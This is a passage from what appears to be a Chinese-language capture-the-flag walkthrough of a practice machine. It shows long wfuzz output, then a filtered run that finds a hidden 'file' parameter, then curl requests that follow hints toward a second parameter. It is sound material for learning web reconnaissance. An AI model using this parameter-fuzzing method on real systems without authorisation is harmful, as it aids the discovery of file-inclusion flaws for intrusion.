000000417:   200        7 L      12 W       136 Ch      "inc"
000000414:   200        7 L      12 W       136 Ch      "img"
000000412:   200        7 L      12 W       136 Ch      "iis"
000000415:   200        7 L      12 W       136 Ch      "import"
000000416:   200        7 L      12 W       136 Ch      "inbox"
000000410:   200        7 L      12 W       136 Ch      "icons"
000000409:   200        7 L      12 W       136 Ch      "ibm"
000000408:   200        7 L      12 W       136 Ch      "htmls"
000000407:   200        7 L      12 W       136 Ch      "html"
000000404:   200        7 L      12 W       136 Ch      "hosts"
000000411:   200        7 L      12 W       136 Ch      "idbc"
000000406:   200        7 L      12 W       136 Ch      "htm"
000000403:   200        7 L      12 W       136 Ch      "host"
000000400:   200        7 L      12 W       136 Ch      "homepage"
000000402:   200        7 L      12 W       136 Ch      "homework"
000000427:   200        7 L      12 W       136 Ch      "info"
000000429:   200        7 L      12 W       136 Ch      "ingres"
000000433:   200        7 L      12 W       136 Ch      "input"
000000441:   200        7 L      12 W       136 Ch      "intro"
000000457:   200        7 L      12 W       136 Ch      "jsp"
000000476:   200        7 L      12 W       136 Ch      "links"
000000473:   200        7 L      12 W       136 Ch      "library"
000000472:   200        7 L      12 W       136 Ch      "libraries"
000000475:   200        7 L      12 W       136 Ch      "link"
000000468:   200        7 L      12 W       136 Ch      "ldap"
000000470:   200        7 L      12 W       136 Ch      "level"
000000474:   200        7 L      12 W       136 Ch      "libs"
000000466:   200        7 L      12 W       136 Ch      "launch"
000000465:   200        7 L      12 W       136 Ch      "labs"
000000467:   200        7 L      12 W       136 Ch      "launchpage"
000000459:   200        7 L      12 W       136 Ch      "jsr"
000000461:   200        7 L      12 W       136 Ch      "kept"
000000463:   200        7 L      12 W       136 Ch      "key"
000000460:   200        7 L      12 W       136 Ch      "keep"
000000454:   200        7 L      12 W       136 Ch      "jrun"
000000455:   200        7 L      12 W       136 Ch      "jira"
000000458:   200        7 L      12 W       136 Ch      "jsps"
000000462:   200        7 L      12 W       136 Ch      "kernel"
000000456:   200        7 L      12 W       136 Ch      "js"
000000464:   200        7 L      12 W       136 Ch      "lab"
000000471:   200        7 L      12 W       136 Ch      "lib"
000000469:   200        7 L      12 W       136 Ch      "left"
000000451:   200        7 L      12 W       136 Ch      "jdbc"
000000452:   200        7 L      12 W       136 Ch      "job"
000000449:   200        7 L      12 W       136 Ch      "javascript"
000000450:   200        7 L      12 W       136 Ch      "java-sys"
000000447:   200        7 L      12 W       136 Ch      "j"
000000453:   200        7 L      12 W       136 Ch      "join"
000000448:   200        7 L      12 W       136 Ch      "java"
000000446:   200        7 L      12 W       136 Ch      "ips"
000000445:   200        7 L      12 W       136 Ch      "ipp"
000000444:   200        7 L      12 W       136 Ch      "invite"
000000443:   200        7 L      12 W       136 Ch      "invitation"
000000437:   200        7 L      12 W       136 Ch      "interactive"
000000440:   200        7 L      12 W       136 Ch      "intranet"
000000435:   200        7 L      12 W       136 Ch      "INSTALL_admin"
000000439:   200        7 L      12 W       136 Ch      "internet"
000000432:   200        7 L      12 W       136 Ch      "init"
000000438:   200        7 L      12 W       136 Ch      "internal"
000000442:   200        7 L      12 W       136 Ch      "inventory"
000000436:   200        7 L      12 W       136 Ch      "installation"
000000434:   200        7 L      12 W       136 Ch      "install"
000000483:   200        7 L      12 W       136 Ch      "log"
000000431:   200        7 L      12 W       136 Ch      "ini"
000000477:   200        7 L      12 W       136 Ch      "linux"
000000430:   200        7 L      12 W       136 Ch      "ingress"
000000497:   200        7 L      12 W       136 Ch      "magic"
000000496:   200        7 L      12 W       136 Ch      "ls"
000000491:   200        7 L      12 W       136 Ch      "logon"
000000428:   200        7 L      12 W       136 Ch      "information"
000000479:   200        7 L      12 W       136 Ch      "load"
000000495:   200        7 L      12 W       136 Ch      "lost%2Bfound"
000000488:   200        7 L      12 W       136 Ch      "logging"
000000487:   200        7 L      12 W       136 Ch      "logger"
000000490:   200        7 L      12 W       136 Ch      "logo"
000000494:   200        7 L      12 W       136 Ch      "Logs"
000000489:   200        7 L      12 W       136 Ch      "login"
000000492:   200        7 L      12 W       136 Ch      "logout"
000000486:   200        7 L      12 W       136 Ch      "logfiles"
000000493:   200        7 L      12 W       136 Ch      "logs"
000000485:   200        7 L      12 W       136 Ch      "logfile"
000000482:   200        7 L      12 W       136 Ch      "lockout"
000000500:   200        7 L      12 W       136 Ch      "maillist"
000000504:   200        7 L      12 W       136 Ch      "man"
000000478:   200        7 L      12 W       136 Ch      "list"
000000484:   200        7 L      12 W       136 Ch      "Log"
000000518:   200        7 L      12 W       136 Ch      "memory"
000000498:   200        7 L      12 W       136 Ch      "mail"
000000480:   200        7 L      12 W       136 Ch      "loader"
000000512:   200        7 L      12 W       136 Ch      "master"
000000481:   200        7 L      12 W       136 Ch      "lock"
000000522:   200        7 L      12 W       136 Ch      "messaging"
000000521:   200        7 L      12 W       136 Ch      "messages"
000000514:   200        7 L      12 W       136 Ch      "mdb"
000000516:   200        7 L      12 W       136 Ch      "member"
000000517:   200        7 L      12 W       136 Ch      "members"
000000511:   200        7 L      12 W       136 Ch      "marketing"
000000520:   200        7 L      12 W       136 Ch      "message"
000000515:   200        7 L      12 W       136 Ch      "me"
000000519:   200        7 L      12 W       136 Ch      "menu"
000000513:   200        7 L      12 W       136 Ch      "mbo"
000000510:   200        7 L      12 W       136 Ch      "market"
000000499:   200        7 L      12 W       136 Ch      "mailbox"
000000509:   200        7 L      12 W       136 Ch      "map"
000000508:   200        7 L      12 W       136 Ch      "manual"
000000503:   200        7 L      12 W       136 Ch      "makefile"
000000505:   200        7 L      12 W       136 Ch      "manage"
000000507:   200        7 L      12 W       136 Ch      "manager"
000000502:   200        7 L      12 W       136 Ch      "maint"
000000506:   200        7 L      12 W       136 Ch      "management"
000000523:   200        7 L      12 W       136 Ch      "meta"
000000525:   200        7 L      12 W       136 Ch      "mgr"
000000553:   200        7 L      12 W       136 Ch      "net"
000000537:   200        7 L      12 W       136 Ch      "mount"
000000564:   200        7 L      12 W       136 Ch      "nul"
000000501:   200        7 L      12 W       136 Ch      "main"
000000529:   200        7 L      12 W       136 Ch      "mirrors"
000000565:   200        7 L      12 W       136 Ch      "null"
000000563:   200        7 L      12 W       136 Ch      "novell"
000000562:   200        7 L      12 W       136 Ch      "notes"
000000561:   200        7 L      12 W       136 Ch      "nobody"
000000560:   200        7 L      12 W       136 Ch      "nl"
000000555:   200        7 L      12 W       136 Ch      "netstat"
000000556:   200        7 L      12 W       136 Ch      "network"
000000557:   200        7 L      12 W       136 Ch      "new"
000000559:   200        7 L      12 W       136 Ch      "next"
000000558:   200        7 L      12 W       136 Ch      "news"
000000550:   200        7 L      12 W       136 Ch      "names"
000000551:   200        7 L      12 W       136 Ch      "navigation"
000000554:   200        7 L      12 W       136 Ch      "netscape"
000000552:   200        7 L      12 W       136 Ch      "ne"
000000549:   200        7 L      12 W       136 Ch      "my-sql"
000000545:   200        7 L      12 W       136 Ch      "ms-sql"
000000546:   200        7 L      12 W       136 Ch      "music"
000000547:   200        7 L      12 W       136 Ch      "my"
000000548:   200        7 L      12 W       136 Ch      "mysql"
000000544:   200        7 L      12 W       136 Ch      "mssql"
000000540:   200        7 L      12 W       136 Ch      "mqseries"
000000541:   200        7 L      12 W       136 Ch      "mrtg"
000000542:   200        7 L      12 W       136 Ch      "ms"
000000543:   200        7 L      12 W       136 Ch      "msql"
000000539:   200        7 L      12 W       136 Ch      "mp3s"
000000534:   200        7 L      12 W       136 Ch      "module"
000000535:   200        7 L      12 W       136 Ch      "modules"
000000538:   200        7 L      12 W       136 Ch      "mp3"
000000536:   200        7 L      12 W       136 Ch      "monitor"
000000531:   200        7 L      12 W       136 Ch      "mkstats"
000000528:   200        7 L      12 W       136 Ch      "mirror"
000000532:   200        7 L      12 W       136 Ch      "model"
000000533:   200        7 L      12 W       136 Ch      "modem"
000000530:   200        7 L      12 W       136 Ch      "misc"
000000527:   200        7 L      12 W       136 Ch      "minimum"
000000568:   200        7 L      12 W       136 Ch      "objects"
000000566:   200        7 L      12 W       136 Ch      "number"
000000526:   200        7 L      12 W       136 Ch      "mine"
000000524:   200        7 L      12 W       136 Ch      "metabase"
000000572:   200        7 L      12 W       136 Ch      "office"
000000590:   200        7 L      12 W       136 Ch      "pages"
000000589:   200        7 L      12 W       136 Ch      "page"
000000580:   200        7 L      12 W       136 Ch      "openfile"
000000591:   200        7 L      12 W       136 Ch      "_pages"
000000588:   200        7 L      12 W       136 Ch      "pad"
000000584:   200        7 L      12 W       136 Ch      "order"
000000585:   200        7 L      12 W       136 Ch      "orders"
000000586:   200        7 L      12 W       136 Ch      "outgoing"
000000587:   200        7 L      12 W       136 Ch      "output"
000000583:   200        7 L      12 W       136 Ch      "oradata"
000000578:   200        7 L      12 W       136 Ch      "open"
000000581:   200        7 L      12 W       136 Ch      "operator"
000000579:   200        7 L      12 W       136 Ch      "openapp"
000000582:   200        7 L      12 W       136 Ch      "oracle"
000000577:   200        7 L      12 W       136 Ch      "online"
000000576:   200        7 L      12 W       136 Ch      "on"
000000575:   200        7 L      12 W       136 Ch      "oldie"
000000569:   200        7 L      12 W       136 Ch      "odbc"
000000574:   200        7 L      12 W       136 Ch      "old"
000000570:   200        7 L      12 W       136 Ch      "of"
000000573:   200        7 L      12 W       136 Ch      "ogl"
000000592:   200        7 L      12 W       136 Ch      "Pages"
000000571:   200        7 L      12 W       136 Ch      "off"
000000567:   200        7 L      12 W       136 Ch      "object"
000000594:   200        7 L      12 W       136 Ch      "panel"
000000598:   200        7 L      12 W       136 Ch      "passes"
000000606:   200        7 L      12 W       136 Ch      "perl"
000000637:   200        7 L      12 W       136 Ch      "privs"
000000622:   200        7 L      12 W       136 Ch      "policy"
000000639:   200        7 L      12 W       136 Ch      "processform"
000000638:   200        7 L      12 W       136 Ch      "process"
000000640:   200        7 L      12 W       136 Ch      "prod"
000000636:   200        7 L      12 W       136 Ch      "private"
000000641:   200        7 L      12 W       136 Ch      "production"
000000635:   200        7 L      12 W       136 Ch      "priv"
000000634:   200        7 L      12 W       136 Ch      "printenv"
000000630:   200        7 L      12 W       136 Ch      "power"
000000629:   200        7 L      12 W       136 Ch      "postgres"
000000628:   200        7 L      12 W       136 Ch      "post"
000000627:   200        7 L      12 W       136 Ch      "portlets"
000000633:   200        7 L      12 W       136 Ch      "print"
000000632:   200        7 L      12 W       136 Ch      "preview"
000000631:   200        7 L      12 W       136 Ch      "press"
000000625:   200        7 L      12 W       136 Ch      "portal"
000000626:   200        7 L      12 W       136 Ch      "portlet"
000000624:   200        7 L      12 W       136 Ch      "pop"
000000621:   200        7 L      12 W       136 Ch      "pol"
000000620:   200        7 L      12 W       136 Ch      "plx"
000000619:   200        7 L      12 W       136 Ch      "pls"
000000623:   200        7 L      12 W       136 Ch      "poll"
000000613:   200        7 L      12 W       136 Ch      "phpmyadmin"
000000615:   200        7 L      12 W       136 Ch      "pics"
000000618:   200        7 L      12 W       136 Ch      "pl"
000000616:   200        7 L      12 W       136 Ch      "ping"
000000614:   200        7 L      12 W       136 Ch      "phpMyAdmin"
000000617:   200        7 L      12 W       136 Ch      "pix"
000000611:   200        7 L      12 W       136 Ch      "phone"
000000612:   200        7 L      12 W       136 Ch      "php"
000000607:   200        7 L      12 W       136 Ch      "perl5"
000000610:   200        7 L      12 W       136 Ch      "pgsql"
000000608:   200        7 L      12 W       136 Ch      "personal"
000000602:   200        7 L      12 W       136 Ch      "password"
000000603:   200        7 L      12 W       136 Ch      "passwords"
000000601:   200        7 L      12 W       136 Ch      "passwor"
000000605:   200        7 L      12 W       136 Ch      "pdf"
000000609:   200        7 L      12 W       136 Ch      "personals"
000000604:   200        7 L      12 W       136 Ch      "path"
000000593:   200        7 L      12 W       136 Ch      "pam"
000000595:   200        7 L      12 W       136 Ch      "paper"
000000642:   200        7 L      12 W       136 Ch      "products"
000000600:   200        7 L      12 W       136 Ch      "passwd"
000000656:   200        7 L      12 W       136 Ch      "publisher"
000000596:   200        7 L      12 W       136 Ch      "papers"
000000597:   200        7 L      12 W       136 Ch      "pass"
000000599:   200        7 L      12 W       136 Ch      "passw"
000000644:   200        7 L      12 W       136 Ch      "profile"
000000648:   200        7 L      12 W       136 Ch      "properties"
000000666:   200        7 L      12 W       136 Ch      "quote"
000000667:   200        7 L      12 W       136 Ch      "ramon"
000000660:   200        7 L      12 W       136 Ch      "pw"
000000665:   200        7 L      12 W       136 Ch      "queue"
000000662:   200        7 L      12 W       136 Ch      "python"
000000663:   200        7 L      12 W       136 Ch      "queries"
000000659:   200        7 L      12 W       136 Ch      "put"
000000664:   200        7 L      12 W       136 Ch      "query"
000000661:   200        7 L      12 W       136 Ch      "pwd"
000000658:   200        7 L      12 W       136 Ch      "purchases"
000000655:   200        7 L      12 W       136 Ch      "publish"
000000657:   200        7 L      12 W       136 Ch      "purchase"
000000647:   200        7 L      12 W       136 Ch      "proof"
000000654:   200        7 L      12 W       136 Ch      "public"
000000651:   200        7 L      12 W       136 Ch      "proxy"
000000652:   200        7 L      12 W       136 Ch      "ps"
000000649:   200        7 L      12 W       136 Ch      "protect"
000000653:   200        7 L      12 W       136 Ch      "pub"
000000650:   200        7 L      12 W       136 Ch      "protected"
000000646:   200        7 L      12 W       136 Ch      "project"
000000643:   200        7 L      12 W       136 Ch      "professor"
000000670:   200        7 L      12 W       136 Ch      "rcs"
000000683:   200        7 L      12 W       136 Ch      "reminder"
000000684:   200        7 L      12 W       136 Ch      "remote"
000000674:   200        7 L      12 W       136 Ch      "reference"
000000682:   200        7 L      12 W       136 Ch      "remind"
000000681:   200        7 L      12 W       136 Ch      "release"
000000645:   200        7 L      12 W       136 Ch      "program"
000000668:   200        7 L      12 W       136 Ch      "random"
000000680:   200        7 L      12 W       136 Ch      "registered"
000000679:   200        7 L      12 W       136 Ch      "register"
000000678:   200        7 L      12 W       136 Ch      "regional"
000000672:   200        7 L      12 W       136 Ch      "redir"
000000673:   200        7 L      12 W       136 Ch      "redirect"
000000677:   200        7 L      12 W       136 Ch      "reginternal"
000000676:   200        7 L      12 W       136 Ch      "reg"
000000675:   200        7 L      12 W       136 Ch      "references"
000000671:   200        7 L      12 W       136 Ch      "readme"
000000685:   200        7 L      12 W       136 Ch      "removed"
000000669:   200        7 L      12 W       136 Ch      "rank"
000000734:   200        7 L      12 W       136 Ch      "server_stats"
000000687:   200        7 L      12 W       136 Ch      "reports"
000000699:   200        7 L      12 W       136 Ch      "root"
000000715:   200        7 L      12 W       136 Ch      "scripts"
000000691:   200        7 L      12 W       136 Ch      "resource"
000000733:   200        7 L      12 W       136 Ch      "servers"
000000732:   200        7 L      12 W       136 Ch      "server"
000000731:   200        7 L      12 W       136 Ch      "sent"
000000730:   200        7 L      12 W       136 Ch      "sensor"
000000729:   200        7 L      12 W       136 Ch      "sensepost"
000000724:   200        7 L      12 W       136 Ch      "security"
000000726:   200        7 L      12 W       136 Ch      "sell"
000000728:   200        7 L      12 W       136 Ch      "sendmail"
000000727:   200        7 L      12 W       136 Ch      "send"
000000725:   200        7 L      12 W       136 Ch      "select"
000000723:   200        7 L      12 W       136 Ch      "secured"
000000722:   200        7 L      12 W       136 Ch      "secure"
000000721:   200        7 L      12 W       136 Ch      "sections"
000000720:   200        7 L      12 W       136 Ch      "section"
000000719:   200        7 L      12 W       136 Ch      "secrets"
000000714:   200        7 L      12 W       136 Ch      "script"
000000716:   200        7 L      12 W       136 Ch      "sdk"
000000718:   200        7 L      12 W       136 Ch      "secret"
000000710:   200        7 L      12 W       136 Ch      "saved"
000000717:   200        7 L      12 W       136 Ch      "search"
000000712:   200        7 L      12 W       136 Ch      "scr"
000000711:   200        7 L      12 W       136 Ch      "schema"
000000713:   200        7 L      12 W       136 Ch      "scratc"
000000709:   200        7 L      12 W       136 Ch      "save"
000000707:   200        7 L      12 W       136 Ch      "sample"
000000706:   200        7 L      12 W       136 Ch      "sales"
000000708:   200        7 L      12 W       136 Ch      "samples"
000000698:   200        7 L      12 W       136 Ch      "robotics"
000000705:   200        7 L      12 W       136 Ch      "run"
000000702:   200        7 L      12 W       136 Ch      "rpc"
000000703:   200        7 L      12 W       136 Ch      "rss"
000000700:   200        7 L      12 W       136 Ch      "route"
000000704:   200        7 L      12 W       136 Ch      "rules"
000000701:   200        7 L      12 W       136 Ch      "router"
000000697:   200        7 L      12 W       136 Ch      "robot"
000000689:   200        7 L      12 W       136 Ch      "research"
000000690:   200        7 L      12 W       136 Ch      "reseller"
000000693:   200        7 L      12 W       136 Ch      "responder"
000000694:   200        7 L      12 W       136 Ch      "restricted"
000000696:   200        7 L      12 W       136 Ch      "right"
000000688:   200        7 L      12 W       136 Ch      "requisite"
000000686:   200        7 L      12 W       136 Ch      "report"
000000692:   200        7 L      12 W       136 Ch      "resources"
000000695:   200        7 L      12 W       136 Ch      "retail"
000000737:   200        7 L      12 W       136 Ch      "servlet"
000000741:   200        7 L      12 W       136 Ch      "session"
000000749:   200        7 L      12 W       136 Ch      "shell"
000000757:   200        7 L      12 W       136 Ch      "signature"
000000735:   200        7 L      12 W       136 Ch      "service"
000000752:   200        7 L      12 W       136 Ch      "shopper"
000000754:   200        7 L      12 W       136 Ch      "showcode"
000000756:   200        7 L      12 W       136 Ch      "sign"
000000755:   200        7 L      12 W       136 Ch      "shtml"
000000753:   200        7 L      12 W       136 Ch      "show"
000000751:   200        7 L      12 W       136 Ch      "shop"
000000750:   200        7 L      12 W       136 Ch      "shit"
000000748:   200        7 L      12 W       136 Ch      "shared"
000000747:   200        7 L      12 W       136 Ch      "share"
000000746:   200        7 L      12 W       136 Ch      "setup"
000000742:   200        7 L      12 W       136 Ch      "sessions"
000000743:   200        7 L      12 W       136 Ch      "set"
000000745:   200        7 L      12 W       136 Ch      "settings"
000000744:   200        7 L      12 W       136 Ch      "setting"
000000740:   200        7 L      12 W       136 Ch      "Servlets"
000000736:   200        7 L      12 W       136 Ch      "services"
000000738:   200        7 L      12 W       136 Ch      "Servlet"
000000739:   200        7 L      12 W       136 Ch      "servlets"
000000758:   200        7 L      12 W       136 Ch      "signin"
000000772:   200        7 L      12 W       136 Ch      "somebody"
000000778:   200        7 L      12 W       136 Ch      "sql"
000000760:   200        7 L      12 W       136 Ch      "single"
000000779:   200        7 L      12 W       136 Ch      "sqladmin"
000000764:   200        7 L      12 W       136 Ch      "SiteServer"
000000780:   200        7 L      12 W       136 Ch      "src"
000000777:   200        7 L      12 W       136 Ch      "spanish"
000000769:   200        7 L      12 W       136 Ch      "software"
000000776:   200        7 L      12 W       136 Ch      "spain"
000000771:   200        7 L      12 W       136 Ch      "solutions"
000000774:   200        7 L      12 W       136 Ch      "sources"
000000768:   200        7 L      12 W       136 Ch      "soapdocs"
000000775:   200        7 L      12 W       136 Ch      "Sources"
000000770:   200        7 L      12 W       136 Ch      "solaris"
000000773:   200        7 L      12 W       136 Ch      "source"
000000767:   200        7 L      12 W       136 Ch      "soap"
000000762:   200        7 L      12 W       136 Ch      "sitemap"
000000787:   200        7 L      12 W       136 Ch      "startpage"
000000781:   200        7 L      12 W       136 Ch      "srchad"
000000759:   200        7 L      12 W       136 Ch      "simple"
000000761:   200        7 L      12 W       136 Ch      "site"
000000783:   200        7 L      12 W       136 Ch      "ssi"
000000766:   200        7 L      12 W       136 Ch      "snoop"
000000763:   200        7 L      12 W       136 Ch      "sites"
000000765:   200        7 L      12 W       136 Ch      "small"
000000795:   200        7 L      12 W       136 Ch      "stop"
000000791:   200        7 L      12 W       136 Ch      "Statistics"
000000794:   200        7 L      12 W       136 Ch      "status"
000000793:   200        7 L      12 W       136 Ch      "Stats"
000000792:   200        7 L      12 W       136 Ch      "stats"
000000796:   200        7 L      12 W       136 Ch      "store"
000000790:   200        7 L      12 W       136 Ch      "statistics"
000000789:   200        7 L      12 W       136 Ch      "statistic"
000000786:   200        7 L      12 W       136 Ch      "start"
000000797:   200        7 L      12 W       136 Ch      "story"
000000799:   200        7 L      12 W       136 Ch      "student"
000000803:   200        7 L      12 W       136 Ch      "stylesheets"
000000811:   200        7 L      12 W       136 Ch      "svc"
000000788:   200        7 L      12 W       136 Ch      "stat"
000000844:   200        7 L      12 W       136 Ch      "tpv"
000000784:   200        7 L      12 W       136 Ch      "ssl"
000000785:   200        7 L      12 W       136 Ch      "staff"
000000782:   200        7 L      12 W       136 Ch      "srv"
000000827:   200        7 L      12 W       136 Ch      "temporal"
000000843:   200        7 L      12 W       136 Ch      "tour"
000000841:   200        7 L      12 W       136 Ch      "top"
000000842:   200        7 L      12 W       136 Ch      "topics"
000000835:   200        7 L      12 W       136 Ch      "ticket"
000000840:   200        7 L      12 W       136 Ch      "tools"
000000837:   200        7 L      12 W       136 Ch      "today"
000000838:   200        7 L      12 W       136 Ch      "tool"
000000834:   200        7 L      12 W       136 Ch      "texts"
000000839:   200        7 L      12 W       136 Ch      "toolbar"
000000836:   200        7 L      12 W       136 Ch      "tmp"
000000833:   200        7 L      12 W       136 Ch      "text"
000000832:   200        7 L      12 W       136 Ch      "tests"
000000826:   200        7 L      12 W       136 Ch      "templates"
000000823:   200        7 L      12 W       136 Ch      "tech"
000000824:   200        7 L      12 W       136 Ch      "temp"
000000825:   200        7 L      12 W       136 Ch      "template"
000000831:   200        7 L      12 W       136 Ch      "testing"
000000829:   200        7 L      12 W       136 Ch      "terminal"
000000828:   200        7 L      12 W       136 Ch      "temps"
000000830:   200        7 L      12 W       136 Ch      "test"
000000822:   200        7 L      12 W       136 Ch      "target"
000000816:   200        7 L      12 W       136 Ch      "sysadmin"
000000818:   200        7 L      12 W       136 Ch      "table"
000000821:   200        7 L      12 W       136 Ch      "tar"
000000819:   200        7 L      12 W       136 Ch      "tag"
000000817:   200        7 L      12 W       136 Ch      "system"
000000820:   200        7 L      12 W       136 Ch      "tape"
000000815:   200        7 L      12 W       136 Ch      "sys"
000000813:   200        7 L      12 W       136 Ch      "svr"
000000814:   200        7 L      12 W       136 Ch      "sw"
000000807:   200        7 L      12 W       136 Ch      "super"
000000810:   200        7 L      12 W       136 Ch      "survey"
000000809:   200        7 L      12 W       136 Ch      "supported"
000000808:   200        7 L      12 W       136 Ch      "support"
000000812:   200        7 L      12 W       136 Ch      "svn"
000000806:   200        7 L      12 W       136 Ch      "sun"
000000805:   200        7 L      12 W       136 Ch      "submitter"
000000802:   200        7 L      12 W       136 Ch      "stylesheet"
000000804:   200        7 L      12 W       136 Ch      "submit"
000000851:   200        7 L      12 W       136 Ch      "trap"
000000859:   200        7 L      12 W       136 Ch      "up"
000000800:   200        7 L      12 W       136 Ch      "stuff"
000000801:   200        7 L      12 W       136 Ch      "style"
000000847:   200        7 L      12 W       136 Ch      "transaction"
000000845:   200        7 L      12 W       136 Ch      "trace"
000000869:   200        7 L      12 W       136 Ch      "ustats"
000000871:   200        7 L      12 W       136 Ch      "utilities"
000000865:   200        7 L      12 W       136 Ch      "usage"
000000870:   200        7 L      12 W       136 Ch      "util"
000000868:   200        7 L      12 W       136 Ch      "usr"
000000866:   200        7 L      12 W       136 Ch      "user"
000000873:   200        7 L      12 W       136 Ch      "utils"
000000798:   200        7 L      12 W       136 Ch      "string"
000000872:   200        7 L      12 W       136 Ch      "utility"
000000867:   200        7 L      12 W       136 Ch      "users"
000000858:   200        7 L      12 W       136 Ch      "unix"
000000862:   200        7 L      12 W       136 Ch      "upload"
000000864:   200        7 L      12 W       136 Ch      "uploads"
000000863:   200        7 L      12 W       136 Ch      "uploader"
000000861:   200        7 L      12 W       136 Ch      "updates"
000000860:   200        7 L      12 W       136 Ch      "update"
000000857:   200        7 L      12 W       136 Ch      "uninstall"
000000856:   200        7 L      12 W       136 Ch      "uddi"
000000855:   200        7 L      12 W       136 Ch      "tutorial"
000000849:   200        7 L      12 W       136 Ch      "transfer"
000000848:   200        7 L      12 W       136 Ch      "transactions"
000000846:   200        7 L      12 W       136 Ch      "traffic"
000000850:   200        7 L      12 W       136 Ch      "transport"
000000853:   200        7 L      12 W       136 Ch      "tree"
000000876:   200        7 L      12 W       136 Ch      "vap"
000000854:   200        7 L      12 W       136 Ch      "trees"
000000852:   200        7 L      12 W       136 Ch      "trash"
000000874:   200        7 L      12 W       136 Ch      "validation"
000000880:   200        7 L      12 W       136 Ch      "vbscript"
000000888:   200        7 L      12 W       136 Ch      "vpn"
000000897:   200        7 L      12 W       136 Ch      "wdav"
000000896:   200        7 L      12 W       136 Ch      "warez"
000000891:   200        7 L      12 W       136 Ch      "w3c"
000000893:   200        7 L      12 W       136 Ch      "W3SVC1"
000000895:   200        7 L      12 W       136 Ch      "W3SVC3"
000000892:   200        7 L      12 W       136 Ch      "W3SVC"
000000887:   200        7 L      12 W       136 Ch      "visitor"
000000886:   200        7 L      12 W       136 Ch      "virtual"
000000889:   200        7 L      12 W       136 Ch      "w"
000000894:   200        7 L      12 W       136 Ch      "W3SVC2"
000000890:   200        7 L      12 W       136 Ch      "w3"
000000879:   200        7 L      12 W       136 Ch      "vbs"
000000881:   200        7 L      12 W       136 Ch      "vbscripts"
000000883:   200        7 L      12 W       136 Ch      "view"
000000882:   200        7 L      12 W       136 Ch      "vfs"
000000885:   200        7 L      12 W       136 Ch      "views"
000000898:   200        7 L      12 W       136 Ch      "web"
000000875:   200        7 L      12 W       136 Ch      "validatior"
000000884:   200        7 L      12 W       136 Ch      "viewer"
000000878:   200        7 L      12 W       136 Ch      "vb"
000000877:   200        7 L      12 W       136 Ch      "var"
000000900:   200        7 L      12 W       136 Ch      "webadmin"
000000904:   200        7 L      12 W       136 Ch      "webdata"
000000912:   200        7 L      12 W       136 Ch      "webmail"
000000921:   200        7 L      12 W       136 Ch      "welcome"
000000920:   200        7 L      12 W       136 Ch      "webvpn"
000000915:   200        7 L      12 W       136 Ch      "webservice"
000000917:   200        7 L      12 W       136 Ch      "website"
000000919:   200        7 L      12 W       136 Ch      "webstats"
000000918:   200        7 L      12 W       136 Ch      "webstat"
000000916:   200        7 L      12 W       136 Ch      "webservices"
000000914:   200        7 L      12 W       136 Ch      "websearch"
000000911:   200        7 L      12 W       136 Ch      "weblogs"
000000913:   200        7 L      12 W       136 Ch      "webmaster"
000000910:   200        7 L      12 W       136 Ch      "weblogic"
000000907:   200        7 L      12 W       136 Ch      "webhits"
000000906:   200        7 L      12 W       136 Ch      "webdist"
000000903:   200        7 L      12 W       136 Ch      "webcart"
000000905:   200        7 L      12 W       136 Ch      "webdav"
000000909:   200        7 L      12 W       136 Ch      "weblog"
000000922:   200        7 L      12 W       136 Ch      "wellcome"
000000899:   200        7 L      12 W       136 Ch      "webaccess"
000000908:   200        7 L      12 W       136 Ch      "WEB-INF"
000000902:   200        7 L      12 W       136 Ch      "webboard"
000000901:   200        7 L      12 W       136 Ch      "webapp"
000000924:   200        7 L      12 W       136 Ch      "whatnot"
000000936:   200        7 L      12 W       136 Ch      "www"
000000928:   200        7 L      12 W       136 Ch      "windows"
000000948:   200        7 L      12 W       136 Ch      "zap"
000000945:   200        7 L      12 W       136 Ch      "xsl"
000000946:   200        7 L      12 W       136 Ch      "xsql"
000000944:   200        7 L      12 W       136 Ch      "xmlrpc"
000000943:   200        7 L      12 W       136 Ch      "xml"
000000947:   200        7 L      12 W       136 Ch      "xyz"
000000942:   200        7 L      12 W       136 Ch      "xfer"
000000941:   200        7 L      12 W       136 Ch      "xcache"
000000940:   200        7 L      12 W       136 Ch      "wwwstats"
000000939:   200        7 L      12 W       136 Ch      "wwwlog"
000000931:   200        7 L      12 W       136 Ch      "workplace"
000000933:   200        7 L      12 W       136 Ch      "ws"
000000938:   200        7 L      12 W       136 Ch      "wwwjoin"
000000934:   200        7 L      12 W       136 Ch      "wstats"
000000932:   200        7 L      12 W       136 Ch      "workshop"
000000935:   200        7 L      12 W       136 Ch      "wusage"
000000937:   200        7 L      12 W       136 Ch      "wwwboard"
000000930:   200        7 L      12 W       136 Ch      "work"
000000927:   200        7 L      12 W       136 Ch      "win"
000000929:   200        7 L      12 W       136 Ch      "word"
000000926:   200        7 L      12 W       136 Ch      "will"
000000949:   200        7 L      12 W       136 Ch      "zip"
000000951:   200        7 L      12 W       136 Ch      "zips"
000000923:   200        7 L      12 W       136 Ch      "whatever"
000000925:   200        7 L      12 W       136 Ch      "whois"
000000950:   200        7 L      12 W       136 Ch      "zipfiles"
Total time: 0
Processed Requests: 951
Filtered Requests: 0
Requests/sec.: 0

添加--h 参数 隐藏无效响应的字符

└─$ wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://10.10.10.132/index.php?FUZZ=something
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************
Target: http://10.10.10.132/index.php?FUZZ=something
Total requests: 951
=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000000341:   200        7 L      19 W       206 Ch      "file"
Total time: 0.813889
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 1168.462

获得一个可用参数file，尝试访问

└─$ curl http://10.10.10.132/index.php?file
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>
Do something better <br><br><br><br><br><br>you are digging wrong file</html>

提示错误的文件，想起来secret.txt里提示了一个location.txt文件，尝试访问

└─$ curl http://10.10.10.132/index.php?file=location.txt
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>
Do something better <br><br><br><br><br><br>ok well Now you reah at the exact parameter <br><br>Now dig some more for next one <br>use 'secrettier360' parameter on some other php page for more fun.
</html>

提示去其他的php页面使用secrettier360进行访问，目前php页面有

• index.php
• image.php
• .php

.php页面无法访问，尝试携带secrettier360参数访问image.php

